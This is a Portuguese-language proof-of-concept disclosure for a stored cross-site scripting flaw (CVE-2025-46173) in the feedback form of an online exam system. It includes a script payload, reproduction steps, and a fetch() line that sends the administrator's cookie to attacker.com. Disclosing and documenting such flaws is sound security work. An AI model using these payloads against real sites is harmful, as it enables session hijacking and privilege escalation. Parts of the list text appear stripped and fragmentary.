
PoC para o CVE-2025-46173
CVE-2025-46173 é uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado descoberta no Online Exam Mastering System 1.0 da code-projects. A vulnerabilidade existe no componente feedback.php, onde a entrada do usuário no campo de nome não é devidamente sanitizada, permitindo que um agente malicioso injete JavaScript arbitrário. Quando um administrador visualiza esse feedback no painel administrativo (dash.php), o payload é executado no navegador do administrador, levando ao sequestro de sessão e à potencial escalada de privilégios.
feedback.php, dash.phpUm usuário envia o seguinte payload no campo Nome do formulário de feedback:
<script>alert(document.cookie)</script>

Quando o administrador visualiza posteriormente o feedback enviado em dash.php, o payload é executado:

O cookie de sessão do administrador é exposto por meio de document.cookie, que pode ser exfiltrado:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
Clone ou configure a versão vulnerável a partir de code-projects.
Navegue até localhost/exam/feedback.php.
Preencha o campo "Nome" com:
<script>alert(document.cookie)</script>
Envie o formulário.
Faça login como administrador e visite dash.php?q=3 para visualizar o feedback.
O script será executado no contexto do administrador.
A exploração bem-sucedida permite que um atacante remoto:
&, <, >, ").htmlspecialchars() do PHP, ou uma combinação de validação no frontend + sanitização no backend.Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
As capturas de tela são apenas para fins educacionais. Todos os testes foram realizados em um ambiente local.
Clique aqui para assistir ao vídeo de demonstração
Estas informações são fornecidas apenas para fins educacionais e de pesquisa. Não as utilize em sistemas que você não possui ou para os quais não tenha permissão explícita de teste.